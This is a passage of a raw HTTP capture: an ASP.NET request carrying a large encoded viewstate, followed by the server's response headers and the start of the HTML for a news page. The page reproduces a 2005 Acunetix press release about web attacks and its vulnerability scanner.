XBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4%2B8K4F%2F0js11lBw12IN%2FOFdqHcc%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKpz%2FfHDgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ90tjPbD69UwpHdROB4Qqxfz1aHXA%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 30429
          
          
          Response body (30429 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtY